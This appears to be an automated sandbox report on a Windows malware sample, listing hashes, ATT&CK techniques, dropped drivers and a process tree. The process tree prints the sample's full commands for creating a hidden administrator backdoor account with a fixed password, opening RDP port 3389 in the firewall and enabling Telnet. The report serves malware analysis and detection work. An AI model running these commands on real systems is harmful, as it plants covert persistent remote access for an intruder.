6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850

Analysis

max time kernel
144s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
07/03/2023, 20:43

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

TestingIndoa.bin.exe
Size

11.5MB
MD5

928e37519022745490d1af1ce6f336f7
SHA1

b7840242393013f2c4c136ac7407e332be075702
SHA256

6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850
SHA512

8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c
SSDEEP

196608:JZnMy97vfgla5NX7YaP6uIEJsp+jb4agYSUpHm6g90MrYmhZZoG0tLzr1+W:LnMy9rfma5NrYaVzC0b4vpZZoG0tR+W

Score

9^/10

evasion persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Modify Existing Service

T1031

pid	Process
4492	netsh.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
228	attrib.exe

Sets service image path in registry 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\bkgxgmvpisdtxzym\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\bkgxgmvpisdtxzym.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\yzbvcnsdvsfhuibw\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\yzbvcnsdvsfhuibw.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\mssqlaq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wmyyuqfcjumiiy\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\wmyyuqfcjumiiy.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\pqytlladjbskcxq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\pqytlladjbskcxq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\yqwwaplkhjteetmew\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\yqwwaplkhjteetmew.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\oddxdomdydzlynpxp\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\oddxdomdydzlynpxp.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ksquzikqkcczvdkgl\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\ksquzikqkcczvdkgl.sys"	mssql.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	TestingIndoa.bin.exe

Executes dropped EXE 4 IoCs

pid	Process
5056	nc123.exe
220	mssql.exe
3696	mssql2.exe
2728	SearchHost.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	SearchHost.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3332	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: LoadsDriver 32 IoCs

pid	Process
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe
220	mssql.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeLoadDriverPrivilege	220	mssql.exe
Token: SeDebugPrivilege	3696	mssql2.exe
Token: SeIncreaseQuotaPrivilege	4688	WMIC.exe
Token: SeSecurityPrivilege	4688	WMIC.exe
Token: SeTakeOwnershipPrivilege	4688	WMIC.exe
Token: SeLoadDriverPrivilege	4688	WMIC.exe
Token: SeSystemProfilePrivilege	4688	WMIC.exe
Token: SeSystemtimePrivilege	4688	WMIC.exe
Token: SeProfSingleProcessPrivilege	4688	WMIC.exe
Token: SeIncBasePriorityPrivilege	4688	WMIC.exe
Token: SeCreatePagefilePrivilege	4688	WMIC.exe
Token: SeBackupPrivilege	4688	WMIC.exe
Token: SeRestorePrivilege	4688	WMIC.exe
Token: SeShutdownPrivilege	4688	WMIC.exe
Token: SeDebugPrivilege	4688	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4688	WMIC.exe
Token: SeRemoteShutdownPrivilege	4688	WMIC.exe
Token: SeUndockPrivilege	4688	WMIC.exe
Token: SeManageVolumePrivilege	4688	WMIC.exe
Token: 33	4688	WMIC.exe
Token: 34	4688	WMIC.exe
Token: 35	4688	WMIC.exe
Token: 36	4688	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4688	WMIC.exe
Token: SeSecurityPrivilege	4688	WMIC.exe
Token: SeTakeOwnershipPrivilege	4688	WMIC.exe
Token: SeLoadDriverPrivilege	4688	WMIC.exe
Token: SeSystemProfilePrivilege	4688	WMIC.exe
Token: SeSystemtimePrivilege	4688	WMIC.exe
Token: SeProfSingleProcessPrivilege	4688	WMIC.exe
Token: SeIncBasePriorityPrivilege	4688	WMIC.exe
Token: SeCreatePagefilePrivilege	4688	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2728	SearchHost.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2728	SearchHost.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
220	mssql.exe
220	mssql.exe
3696	mssql2.exe
3696	mssql2.exe
2728	SearchHost.exe
220	mssql.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1080 wrote to memory of 5056	1080	TestingIndoa.bin.exe	84
PID 1080 wrote to memory of 5056	1080	TestingIndoa.bin.exe	84
PID 1080 wrote to memory of 5056	1080	TestingIndoa.bin.exe	84
PID 1080 wrote to memory of 220	1080	TestingIndoa.bin.exe	87
PID 1080 wrote to memory of 220	1080	TestingIndoa.bin.exe	87
PID 1080 wrote to memory of 3696	1080	TestingIndoa.bin.exe	88
PID 1080 wrote to memory of 3696	1080	TestingIndoa.bin.exe	88
PID 1080 wrote to memory of 3696	1080	TestingIndoa.bin.exe	88
PID 1080 wrote to memory of 2940	1080	TestingIndoa.bin.exe	90
PID 1080 wrote to memory of 2940	1080	TestingIndoa.bin.exe	90
PID 1080 wrote to memory of 2940	1080	TestingIndoa.bin.exe	90
PID 5056 wrote to memory of 3136	5056	nc123.exe	89
PID 5056 wrote to memory of 3136	5056	nc123.exe	89
PID 5056 wrote to memory of 3136	5056	nc123.exe	89
PID 1080 wrote to memory of 2088	1080	TestingIndoa.bin.exe	91
PID 1080 wrote to memory of 2088	1080	TestingIndoa.bin.exe	91
PID 1080 wrote to memory of 2088	1080	TestingIndoa.bin.exe	91
PID 1080 wrote to memory of 2728	1080	TestingIndoa.bin.exe	94
PID 1080 wrote to memory of 2728	1080	TestingIndoa.bin.exe	94
PID 1080 wrote to memory of 2728	1080	TestingIndoa.bin.exe	94
PID 2088 wrote to memory of 4768	2088	cmd.exe	95
PID 2088 wrote to memory of 4768	2088	cmd.exe	95
PID 2088 wrote to memory of 4768	2088	cmd.exe	95
PID 4768 wrote to memory of 4688	4768	cmd.exe	96
PID 4768 wrote to memory of 4688	4768	cmd.exe	96
PID 4768 wrote to memory of 4688	4768	cmd.exe	96
PID 4768 wrote to memory of 3008	4768	cmd.exe	97
PID 4768 wrote to memory of 3008	4768	cmd.exe	97
PID 4768 wrote to memory of 3008	4768	cmd.exe	97
PID 2088 wrote to memory of 4864	2088	cmd.exe	100
PID 2088 wrote to memory of 4864	2088	cmd.exe	100
PID 2088 wrote to memory of 4864	2088	cmd.exe	100
PID 4864 wrote to memory of 3088	4864	net.exe	101
PID 4864 wrote to memory of 3088	4864	net.exe	101
PID 4864 wrote to memory of 3088	4864	net.exe	101
PID 2088 wrote to memory of 4908	2088	cmd.exe	102
PID 2088 wrote to memory of 4908	2088	cmd.exe	102
PID 2088 wrote to memory of 4908	2088	cmd.exe	102
PID 4908 wrote to memory of 4972	4908	net.exe	103
PID 4908 wrote to memory of 4972	4908	net.exe	103
PID 4908 wrote to memory of 4972	4908	net.exe	103
PID 2088 wrote to memory of 4936	2088	cmd.exe	104
PID 2088 wrote to memory of 4936	2088	cmd.exe	104
PID 2088 wrote to memory of 4936	2088	cmd.exe	104
PID 4936 wrote to memory of 4892	4936	cmd.exe	106
PID 4936 wrote to memory of 4892	4936	cmd.exe	106
PID 4936 wrote to memory of 4892	4936	cmd.exe	106
PID 4936 wrote to memory of 3064	4936	cmd.exe	107
PID 4936 wrote to memory of 3064	4936	cmd.exe	107
PID 4936 wrote to memory of 3064	4936	cmd.exe	107
PID 2088 wrote to memory of 2504	2088	cmd.exe	108
PID 2088 wrote to memory of 2504	2088	cmd.exe	108
PID 2088 wrote to memory of 2504	2088	cmd.exe	108
PID 2504 wrote to memory of 1548	2504	net.exe	109
PID 2504 wrote to memory of 1548	2504	net.exe	109
PID 2504 wrote to memory of 1548	2504	net.exe	109
PID 2088 wrote to memory of 1644	2088	cmd.exe	110
PID 2088 wrote to memory of 1644	2088	cmd.exe	110
PID 2088 wrote to memory of 1644	2088	cmd.exe	110
PID 1644 wrote to memory of 3000	1644	net.exe	111
PID 1644 wrote to memory of 3000	1644	net.exe	111
PID 1644 wrote to memory of 3000	1644	net.exe	111
PID 2088 wrote to memory of 1572	2088	cmd.exe	112
PID 2088 wrote to memory of 1572	2088	cmd.exe	112

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
228	attrib.exe

C:\Users\Admin\AppData\Local\Temp\TestingIndoa.bin.exe
"C:\Users\Admin\AppData\Local\Temp\TestingIndoa.bin.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1080
- C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe
  "C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3136
- C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe
  "C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe"
  2⤵
  - Sets service image path in registry
  - Executes dropped EXE
  - Suspicious behavior: LoadsDriver
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:220
- C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe
  "C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:3696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ac\Shadow.bat" "
  2⤵
  PID:2940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ac\systembackup.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4768
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4688
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      PID:3008
- - C:\Windows\SysWOW64\net.exe
    net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4864
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      PID:3088
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators systembackup /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4908
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators systembackup /add
      4⤵
      PID:4972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
      4⤵
      PID:4892
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      PID:3064
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Remote Desktop Users" systembackup /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2504
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
      4⤵
      PID:1548
- - C:\Windows\SysWOW64\net.exe
    net accounts /forcelogoff:no /maxpwage:unlimited
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      PID:3000
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    3⤵
    PID:3716
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
    3⤵
    PID:116
- - C:\Windows\SysWOW64\attrib.exe
    attrib C:\users\systembackup +r +a +s +h
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:228
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening TCP 3389 "Remote Desktop"
    3⤵
    - Modifies Windows Firewall
    PID:4492
- - C:\Windows\SysWOW64\sc.exe
    sc config tlntsvr start=auto
    3⤵
    - Launches sc.exe
    PID:3332
- - C:\Windows\SysWOW64\net.exe
    net start Telnet
    3⤵
    PID:3884
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start Telnet
      4⤵
      PID:2636
- C:\Users\Admin\AppData\Local\Temp\ac\EVER\SearchHost.exe
  "C:\Users\Admin\AppData\Local\Temp\ac\EVER\SearchHost.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2728

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ac\EVER\Everything.ini

Filesize
19KB

MD5
5531bbb8be242dfc9950f2c2c8aa0058

SHA1
b08aadba390b98055c947dce8821e9e00b7d01ee

SHA256
4f03ab645fe48bf3783eb58568e89b3b3401956dd17cb8049444058dab0634d7

SHA512
3ce7e1d7b330cc9d75c3ce6d4531afe6bfa210a0bcbb45d4a7c29aabff79bebf3263fe0b5377956e2f88036b466383f001a7a6713da04a411b1aceb42bc38291

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\EVER\SearchHost.exe

Filesize
1.6MB

MD5
8add121fa398ebf83e8b5db8f17b45e0

SHA1
c8107e5c5e20349a39d32f424668139a36e6cfd0

SHA256
35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413

SHA512
8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\EVER\SearchHost.exe

Filesize
1.6MB

MD5
8add121fa398ebf83e8b5db8f17b45e0

SHA1
c8107e5c5e20349a39d32f424668139a36e6cfd0

SHA256
35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413

SHA512
8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\EVER\SearchHost.exe

Filesize
1.6MB

MD5
8add121fa398ebf83e8b5db8f17b45e0

SHA1
c8107e5c5e20349a39d32f424668139a36e6cfd0

SHA256
35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413

SHA512
8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\Shadow.bat

Filesize
28B

MD5
df8394082a4e5b362bdcb17390f6676d

SHA1
5750248ff490ceec03d17ee9811ac70176f46614

SHA256
da3f155cfb98ce0add29a31162d23da7596da44ba2391389517fe1a2790da878

SHA512
8ce519dc5c2dd0bbb9f7f48bedf01362c56467800ac0029c8011ee5d9d19e3b3f2eff322e7306acf693e2edb9cf75caaf7b85eb8b2b6c3101ff7e1644950303d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe

Filesize
10.2MB

MD5
f6a3d38aa0ae08c3294d6ed26266693f

SHA1
9ced15d08ffddb01db3912d8af14fb6cc91773f2

SHA256
c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad

SHA512
814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe

Filesize
10.2MB

MD5
f6a3d38aa0ae08c3294d6ed26266693f

SHA1
9ced15d08ffddb01db3912d8af14fb6cc91773f2

SHA256
c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad

SHA512
814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe

Filesize
10.2MB

MD5
f6a3d38aa0ae08c3294d6ed26266693f

SHA1
9ced15d08ffddb01db3912d8af14fb6cc91773f2

SHA256
c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad

SHA512
814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe

Filesize
6.7MB

MD5
f7d94750703f0c1ddd1edd36f6d0371d

SHA1
cc9b95e5952e1c870f7be55d3c77020e56c34b57

SHA256
659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d

SHA512
af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe

Filesize
6.7MB

MD5
f7d94750703f0c1ddd1edd36f6d0371d

SHA1
cc9b95e5952e1c870f7be55d3c77020e56c34b57

SHA256
659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d

SHA512
af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe

Filesize
6.7MB

MD5
f7d94750703f0c1ddd1edd36f6d0371d

SHA1
cc9b95e5952e1c870f7be55d3c77020e56c34b57

SHA256
659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d

SHA512
af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe

Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe

Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe

Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\oddxdomdydzlynpxp.sys

Filesize
674KB

MD5
b2233d1efb0b7a897ea477a66cd08227

SHA1
835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

SHA256
5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

SHA512
6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\systembackup.bat

Filesize
1KB

MD5
b4b2f1a6c7a905781be7d877487fc665

SHA1
7ee27672d89940e96bcb7616560a4bef8d8af76c

SHA256
6246b0045ca11da483e38317421317dc22462a8d81e500dee909a5269c086b5f

SHA512
f883cea56a9ac5dcb838802753770494ce7b1de9d7da6a49b878d534810f9c87170f04e0b8b516ae19b9492f40635a72b3e8a4533d39312383c520abe00c5ae6

Download Submit
memory/220-295-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/220-300-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/220-301-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/220-303-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/220-305-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/3696-292-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/3696-298-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/3696-299-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads